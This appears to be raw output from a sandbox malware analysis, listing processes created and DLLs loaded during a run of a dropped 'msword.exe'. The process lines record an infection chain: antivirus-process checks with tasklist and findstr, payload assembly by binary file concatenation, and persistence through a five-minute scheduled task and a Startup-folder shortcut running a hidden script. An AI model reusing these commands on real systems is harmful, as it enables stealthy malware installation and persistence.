Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 677826
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com Prostores.com N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
